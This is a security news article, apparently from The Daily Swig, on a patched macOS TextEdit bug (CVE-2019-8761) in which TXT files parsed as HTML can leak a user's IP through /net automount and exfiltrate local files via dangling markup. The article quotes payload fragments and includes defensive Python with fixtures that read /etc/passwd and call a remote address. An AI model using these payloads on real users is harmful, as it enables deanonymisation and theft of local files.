A macOS vulnerability allowed attackers to smuggle malicious HTML into TXT files that, if opened by victims, could leak their IP address and, worse still, expose the contents of local files.
Now patched, the security flaw stemmed from how TXT files were parsed by TextEdit, the open source Apple application that opens TXT files by default.
Despite this, and the 2019 discovery of memory corruption bugs leading to RCE in Microsoft’s equivalent text editor, Notepad, antivirus software, firewalls, and macOS Gatekeeper treat TXT files “as safe downloads that can’t possibly be malicious” because they supposedly contain only text, said security researcher Paulos Yibelo in a blog post.
“They shouldn’t blindly trust TXT files,” the researcher tells The Daily Swig. Regardless of a file’s extension, “what interprets the file and how it is interpreted matters more than anything”. A .TXT or any other extension “can be malicious if PHP includes it as code,” he adds.
‘Lots of potential attack vectors’
Resolving to explore this underestimated attack vector, Yibelo found that basic formatting applied in TextEdit, such as making text bold or italic, is saved and parsed as RTF rather than as plain text.
Testing then revealed that TextEdit decided how to parse a file from its contents rather than from its .TXT extension, and could be tricked into treating an opened TXT file as an RTF-HTML document. If a TXT file began with <!DOCTYPE HTML><html><head></head><body>, TextEdit parsed the HTML, permitting the injection of limited HTML and opening up “lots of potential attack vectors”.
Leaking the IP address
Acting on this discovery, the researcher then found that macOS Gatekeeper, which is designed to allow only trusted software to run, did not quarantine a TXT file force-downloaded via Tor Browser; once opened, the file leaked the victim’s IP address without their knowledge.
“This is why I use my fully Tor-ified network rather than just Tor Browser,” tweeted HardenedBSD co-founder Shawn Webb in response to the research. “There’s absolutely zero chance for info leakage.”
TextEdit apparently conducted “very limited parsing” on the HTML and many “interesting” HTML attributes were unavailable, said Yibelo.
Fuzzing revealed that a CSS @import url(...) rule inside a <style> tag was allowed to load local CSS files. Only the file:/// scheme worked: external (http) requests were blocked, but the opening of other locally stored files was not.
Yibelo noted that macOS automount, the autofs component that mounts network file systems on demand under mount points such as /net, meant that file:/// URLs could still trigger remote requests.
He added that automount tries to mount a remote host as soon as a path under /net is accessed, so that simply running ls /net/EXAMPLE.com forces macOS to send a network request to EXAMPLE.com.
“While they did a good job blocking TextEdit from making external requests, this was the one thing [Apple] forgot when they allowed file:/// scheme, on OSX file:///net/11.22.33.44/a.css connects to 11.22.33.44.”
Since automount makes its TCP connections from the kernel rather than from the application, any application-level proxy (including the one Tor Browser routes its traffic through) is bypassed, and the victim’s real IP address is leaked even when the browser itself is proxied.
“Allowing unprivileged users [to] automatically mount network resources unchecked is a rather huge security vulnerability,” Shawn Webb also said in his Twitter thread on the research. “None of my systems have autofs/automount enabled for this reason.”
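As an added example (not code from the article or from the researcher), the following Python checks whether the /net automount map that the leak relies on is enabled in an /etc/auto_master file, and produces a hardened copy with that entry commented out. The map text embedded below is a constructed copy of the stock macOS file, and the function names are my own.

```python
# Constructed copy of the stock macOS /etc/auto_master (a fixture for this
# example, not read from the running system). The /net line is the -hosts map:
# touching /net/<host>/... makes the kernel mount <host> over the network.
DEFAULT_AUTO_MASTER = """\
#
# Automounter master map
#
+auto_master\t\t# Use directory service
/net\t\t\t-hosts\t\t-nobrowse,hidefromfinder,nosuid
/home\t\t\tauto_home\t-nobrowse,hidefromfinder
/Network/Servers\t-fstab
/-\t\t\t-static
"""


def _entries(auto_master_text):
    """Yield (mount_point, map_name, options) for each active line, skipping comments."""
    for raw in auto_master_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        yield fields[0], (fields[1] if len(fields) > 1 else ""), fields[2:]


def net_map_enabled(auto_master_text: str) -> bool:
    """True if /net is served by the -hosts map, i.e. file:///net/<host>/ causes a mount."""
    return any(mp == "/net" and mapname == "-hosts"
               for mp, mapname, _ in _entries(auto_master_text))


def disable_net_map(auto_master_text: str) -> str:
    """Return the map text with every active '/net -hosts' line commented out."""
    out = []
    for raw in auto_master_text.splitlines():
        active = raw.split("#", 1)[0].split()
        if len(active) >= 2 and active[0] == "/net" and active[1] == "-hosts":
            out.append("#" + raw)      # comment it out, keep the original text
        else:
            out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    import os
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/auto_master"
    if os.path.exists(path):
        text = open(path).read()
    else:  # not on macOS: demonstrate on the embedded fixture
        path, text = "<embedded fixture>", DEFAULT_AUTO_MASTER
    state = "ENABLED" if net_map_enabled(text) else "disabled"
    print(f"{path}: /net -hosts map is {state}")
    if net_map_enabled(text):
        print("hardened map:\n" + disable_net_map(text))
```

On a real Mac, run it against /etc/auto_master; after editing that file, reload the maps with sudo automount -vc. Disabling /net removes on-demand host mounts for every user, so confirm nothing depends on them first.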
Yibelo also previewed an upcoming browser exploit that means force-downloaded TXT files can “be opened without user interaction or warning” and leak the “IP straight out of Tor browser.”
Low-dangling fruit
Another HTML element that loaded local files, <iframedoc>, meant an attacker could embed a local file with <iframedoc src="file:///etc/passwd"> and have its contents rendered inside the opened TXT file.
Yibelo then mounted a dangling markup attack, a scriptless data exfiltration technique used where dynamic scripting is unavailable: an unclosed tag or attribute swallows the page content that follows it, which is then sent to the attacker’s server as part of a request URL.
“By combining the <style> CSS attribute with the <iframedoc> attribute, an attacker can first include an unclosed style tag, embed the contents of the file they want to steal, and then leak the content as dangling parameters to their evil site as soon as the file is open,” he explained.
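Taken together, the tricks above (the <!DOCTYPE HTML> prologue, the @import of a file:///net/ URL, the <iframedoc> local include and the unclosed <style> tag) can be screened for on the receiving side without ever opening the file in TextEdit. The Python below is an added example, not code from the article or from the researcher: it classifies a nominal TXT file by its contents rather than its extension, lists every URL it references, and labels those that would read a local file or, via /net/<host>, make the automounter contact a remote host. The sample files are constructed fixtures and the function names are my own.

```python
import re
from urllib.parse import urlparse

# Constructed sample "TXT" files (inline fixtures, not files from the research):
# a genuine text file, one carrying the HTML prologue plus an @import of a
# file:///net/ URL, and one with a local include and an unclosed <style> tag.
SAMPLES = {
    "notes.txt": "Meeting notes\n- nothing special here\n",
    "leak.txt": (
        "<!DOCTYPE HTML><html><head>"
        "<style>@import url(file:///net/11.22.33.44/a.css);</style>"
        "</head><body>hello</body></html>"
    ),
    "dangling.txt": (
        "<!DOCTYPE HTML><html><head></head><body>"
        '<iframedoc src="file:///etc/passwd">'
        "<style>@import url(file:///net/11.22.33.44/"   # deliberately never closed
    ),
}

HTML_PROLOGUE = re.compile(r"^\s*<!DOCTYPE\s+HTML", re.IGNORECASE)
# url(...) in CSS and src= on any element, quoted or not
URL_REFS = re.compile(r"""(?:url\(\s*|\bsrc\s*=\s*)["']?([^"')\s>]+)""", re.IGNORECASE)
STYLE_OPEN = re.compile(r"<style\b", re.IGNORECASE)
STYLE_CLOSE = re.compile(r"</style\s*>", re.IGNORECASE)


def looks_like_html(data: str) -> bool:
    """Content-based check: does a nominal text file open with an HTML prologue?"""
    return HTML_PROLOGUE.match(data) is not None


def classify_ref(url: str) -> str:
    """Label a referenced URL by what resolving it would do on a macOS host."""
    p = urlparse(url)
    if p.scheme != "file":
        return "remote"            # http(s) etc.: TextEdit blocked these
    if p.netloc not in ("", "localhost"):
        return "remote"            # file://host/... also names a remote host
    parts = [s for s in p.path.split("/") if s]
    if len(parts) >= 2 and parts[0] == "net":
        # /net/<host>/... is the autofs -hosts map: the kernel mounts <host>
        # over the network, outside any application-level proxy
        return "automount-leak:" + parts[1]
    return "local-read"


def scan(data: str) -> dict:
    """Return findings for one file's contents."""
    findings = {"html": looks_like_html(data), "refs": [], "unclosed_style": False}
    if not findings["html"]:
        return findings
    findings["refs"] = [(u, classify_ref(u)) for u in URL_REFS.findall(data)]
    # more <style> openers than closers: the dangling-markup setup
    findings["unclosed_style"] = (
        len(STYLE_OPEN.findall(data)) > len(STYLE_CLOSE.findall(data))
    )
    return findings


def verdict(findings: dict) -> str:
    """One-line summary a triage script or mail gateway could act on."""
    if not findings["html"]:
        return "plain text"
    kinds = {k.split(":")[0] for _, k in findings["refs"]}
    if findings["unclosed_style"] or "automount-leak" in kinds:
        return "suspicious: HTML in TXT with leak potential"
    if kinds & {"local-read", "remote"}:
        return "suspicious: HTML in TXT with file reference"
    return "suspicious: HTML in TXT"


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        f = scan(data)
        print(f"{name}: {verdict(f)}")
        for url, kind in f["refs"]:
            print(f"    {kind:<28} {url}")
```

The scan is deliberately conservative: anything that starts with an HTML prologue is flagged even if it references nothing, because the point of the bug is that the extension says nothing about how the file will be interpreted.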
“Given how simple it is to exploit, I’d give it a high CVSS,” said the researcher.
Shawn Webb also said: “These days, there aren’t many text editors that will just edit text and do nothing more,” before adding: “As security researchers, we’re left with dumping the contents of the file with a simple hex editor and parsing each hex character ourselves. That is, at least, if you need to be incredibly careful. Adjust according to your threat models and accepted risks.”
‘Improved checks’
Yibelo reported the bug in 2019, and Apple’s advisory for CVE-2019-8761 said the “issue was addressed with improved checks” in macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006.
This article was updated on April 6 with additional comments from Paulos Yibelo and Shawn Webb.
The Daily Swig has also contacted Apple for comment and we will update the article if and when we hear back.
Source: https://portswigger.net/daily-swig/apple-macos-textedit-parsing-flaw-leaked-local-files-via-dangling-markup-injection